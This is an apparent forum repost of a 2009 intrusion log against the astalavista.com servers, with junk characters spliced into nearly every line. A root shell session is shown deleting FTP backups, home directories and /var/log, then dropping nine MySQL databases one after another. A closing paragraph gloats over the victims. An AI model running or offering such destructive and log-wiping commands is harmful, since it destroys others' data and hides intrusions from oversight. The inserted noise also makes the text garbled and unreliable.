0 B: d7 B S0 e. G* W-rw-rw-rw- 1 astalavista.com users 88287111 Apr 29 15:57 09-04-29-astacom_sql_full.sql.tar.bz2
9 H" l, u% w* f8 d9 P, r! S: u-rw-rw-rw- 1 astalavista.com users 26413034040 May 2 00:21 09-05-01-astacom-Public_HTML.tar3 }2 j% g6 V; h& w% w p- u
-rw-rw-rw- 1 astalavista.com users 277843549 May 1 17:29 09-05-01-astacom-SQL_Dump.tar6 I- B( o6 E3 \+ o/ _. g
[snip]; s9 J( |3 A. ?: G/ g: Y8 l. X
226 Transfer complete.
h. Y. H: C, j3 nftp> mdelete *
5 H1 d* N) f& ~- D" z1 M6 x) Lftp> ls -la
( c# a: _+ e% s9 i# x0 o7 O v, x3 d227 Entering Passive Mode (212,254,194,163,2,193); m" B0 a$ S0 R6 M8 [5 C# q+ m
150 Opening BINARY mode data connection for ‘file list’.2 p: Y* |/ E: l3 P" i) |
226 Transfer complete.' \$ \# C+ {& u0 }- z+ y0 P
ftp>
# p" n; g& s" a' [" _ w9 c6 `
$ r( e' q' j0 T6 T+ @ Qsh-3.2# cd /home. E, D) q% `2 }) k
sh-3.2# ls -la% S o4 \7 |. I0 y/ H; w2 W+ F
total 120, w" B" D. e2 L, w# S& X% S
drwxr-xr-x 14 root root 4096 Mar 11 17:56 .# H7 n# C* c" o& `. c+ J
drwxr-xr-x 25 root root 4096 Jun 3 02:43 ..
/ [+ n9 a y: W# q* M( `drwx–x–x 9 admin admin 4096 Nov 28 2007 admin1 x0 B* s9 H6 I. r: R- j0 p) h
-rw——- 1 root root 8192 Jun 4 03:03 aquota.group* ]5 a2 l! \% F* d; W" a( z; y
-rw——- 1 root root 8192 Jun 3 02:45 aquota.user
- u! \% H& s- |drwx–x–x 6 astanet astanet 4096 Jun 4 09:51 astanet
+ I( D% }6 z5 z6 Gdrwxr-xr-x 2 root root 4096 Jul 29 2008 backup
/ `1 T, Q5 y& T3 P X4 m. X& Xdrwxr-xr-x 2 root root 4096 Sep 17 2008 backup.14161* x) {0 t: a2 p" a0 T
drwx–x–x 10 com com 4096 Apr 28 12:40 com9 C+ @/ ]4 z7 P( V
drwxr-xr-x 2 root root 4096 May 17 2007 ftp- q1 Y5 w' [1 B% }; b0 g
drwx—— 3 jon jon 4096 Sep 21 2007 jon
1 L' S7 ~ y0 p; x6 b9 Z+ L5 Adrwx—— 2 root root 16384 Sep 11 2007 lost+found
$ \5 l: N3 q. Tdrwxr-xr-x 2 root root 4096 Sep 14 2007 my: ^% A) k, X- K+ z% X
drwxr-xr-x 5 mysql mysql 4096 Sep 24 2007 mysqldata
2 a3 m: V* V9 j5 idrwx—— 2 jon jon 4096 Sep 15 2007 test
7 e, ~5 v6 E( R4 ydrwxrwxrwt 2 root root 4096 Jul 29 2008 tmp/ D; B5 f! `9 c
$ M) x9 S' ^: i; V$ i% Jsh-3.2# rm -rf backup/$ X+ L7 E' C9 J/ Q2 M/ O
sh-3.2# rm -rf backup.14161/& h7 \8 h0 b& W% n, _
sh-3.2# rm -rf ftp/" f* z5 Q; w& {) \
sh-3.2# rm -rf jon/
; L+ g! u7 Z# z8 X: V+ Dsh-3.2# rm -rf my/- g, G' c3 T& {7 W. g; J( d
sh-3.2# rm -rf mysqldata/
& `' W/ v8 R6 rsh-3.2# rm -rf test/0 o; ~' K2 U; J! ~
sh-3.2# rm -rf tmp// H) W7 C1 M" r# J
sh-3.2# cd ~
) Y" {) | O* I, T5 Y) gsh-3.2# rm -rf *
+ K7 t3 C! v- d% _( xsh-3.2# rm -rf /var/log/; V+ _) @2 J3 n1 r
rm: cannot remove directory `/var/log//proftpd’: Directory not empty
0 o! X0 e! y$ Csh-3.2# rm -rf /home/*
- \7 Z; e0 I* H6 ~9 ^sh-3.2# mysql! Q% _, [! d% j _
Welcome to the MySQL monitor. Commands end with ; or \g.
; k, t2 c7 O$ ]6 x: h! zYour MySQL connection id is 407156
6 I; P8 j' G* D+ _9 ~Server version: 5.0.45-community-log MySQL Community Edition (GPL)& z. q: \5 o* o6 G n) t h/ r- k
/ U1 K) M) \/ z; i# K3 O9 D, iType ‘help;’ or ‘\h’ for help. Type ‘\c’ to clear the buffer.
$ M4 K- l9 n7 f7 `! W v0 D& D- W! e' Q( f( H2 z3 d
mysql> show databases;
% Q7 J% c# @1 w, {3 i6 z0 ]+———————–+- j3 [$ m3 T5 q! J, X( F d7 C
| Database |# J, p8 g9 O) A
+———————–+
& H/ U8 v' x- [( P2 |) F| information_schema |
" |) s, B. T" s5 e# v, p, ]| astanet_ads |' o) n J9 D" c7 x$ S8 ]& _7 p
| astanet_mailing_lists |
! E0 l( T3 s* t6 |$ y! B+ G' v5 ]| astanet_mediawiki |# ~- E8 X* d1 ?" l& U
| astanet_membersystem |' U4 C X* o" k
| com_contrexx |
$ z: s) e ~ @, Z7 k5 b| com_contrexx2 |
2 T j( ]7 B1 n: O3 f. I| com_contrexx2_live |
; x' L' e5 X/ _3 {# ~. O1 Q| da_roundcube |
( j/ i$ E+ W5 I2 F3 e% `| dolphin |
" A; }% e' n5 [ e: v1 Y' q4 }| ideapool |. N) k; N, {$ H. P! b
| mysql |
$ P4 a* L, D6 q! u| test |7 J$ i. r8 w* ?/ D0 F
| yourmaster |5 d! u5 M" M( F
+———————–+
1 g+ J$ {; j4 q, A& P1 C3 ?14 rows in set (0.03 sec)
2 R- S( T7 e& [/ x, P# p5 q' B1 Y" |: n% y# n
mysql> drop database astanet_membersystem;
7 A; @* g! Y+ M5 c5 idroQuery OK, 46 rows affected (0.81 sec)4 h, L5 j. n& V$ ~& b1 a
. S" p& E6 A) `' F9 hmysql> drop database com_contrexx;
+ }5 y2 l( n7 ]& t* y3 O& h' n6 C/ WQuery OK, 211 rows affected (2.72 sec)
) i/ y# K4 }; b4 N
& {1 X( J, h& G/ X: Ymysql> drop database com_contrexx2;
7 N) \2 D, L9 P% U* K4 c' a; }Query OK, 237 rows affected (2.23 sec)7 ~, H! P- f" A4 y: ^" E
- R3 S- X6 H O% o/ hmysql> drop database com_contrexx2_live;
( ^2 X9 C: X& D* x+ m# T% IQuery OK, 227 rows affected (7.63 sec) f& m0 T- ~8 F$ q0 K8 c3 D; s
. c" I0 b$ R6 e% [3 Q+ f: B6 M- Y
mysql> drop database ideapool;5 \; k4 ~! n6 h( G/ ]
Query OK, 69 rows affected (0.19 sec)
4 {; R. m# p: Q: Y/ l8 T0 ?% s; M i& c
mysql> drop database yourmaster;
( D- m, O# C* ?) i N, ~! X+ UQuery OK, 158 rows affected (0.55 sec)# J$ _: z- o2 w6 E- T0 |- c
1 e# |* h+ M( r& s/ ^$ ]5 ~mysql> drop database astanet_ads; j+ Y) s5 O* k! U7 d
Query OK, 9 rows affected (0.11 sec)9 R4 o; U: l9 w( F5 a
0 p) s ^' g6 B( I( {1 i
mysql> drop database astanet_mailing_lists;
7 o3 g" G' v- Z; e+ R% l- vQuery OK, 24 rows affected (1.47 sec)
( c' ]2 N1 `. R( j- F' E, m# D5 h/ N" Z) i( E3 w$ W
mysql> drop database astanet_mediawiki;! F/ n( a1 Z5 i7 @
Query OK, 31 rows affected (0.51 sec)+ n0 y" l, W6 h5 ^& l! g3 S, J
$ B D7 i& `3 Y. Kmysql> show databases;$ P; q3 K0 L' u: c! _+ O; i
+——————–+4 ^ T$ Q) ~: [; C3 X/ X' ?
| Database |& X1 G$ k/ u: m6 ~$ J+ P* c0 J
+——————–+
* ] M3 f H, j/ O( L0 y7 P| information_schema |, G7 h6 ~3 P: m2 q) u# x1 h* Y B: M
| da_roundcube |
! [- n& \, y: ?! w0 a, n| dolphin |( l/ U$ H+ E1 f# `
| mysql |8 P' b2 x! H1 L, x0 ~0 l9 K9 S
| test |- Q# H+ r0 w3 }/ [4 e
+——————–+
9 c M R: S4 X4 I* X5 rows in set (0.00 sec)
4 b) \/ W9 a# ~/ C% x9 Q) V: y& C% Z& c# z. i( H, W8 M; V
What a journey! We’re not sure exactly why the “Terminator” had any influence on
. S) W) Y0 B: ]7 @' Ntheir naming (conventions) but we’re sure Arnold himself wouldn’t be in the
& f/ k5 m: e) V0 n8 Ewrong to say this pack of morons *wont be back*.0 g% X5 d2 W7 @" B1 s Q
|
发表于 2012-11-6 21:07:34
收藏
支持
反对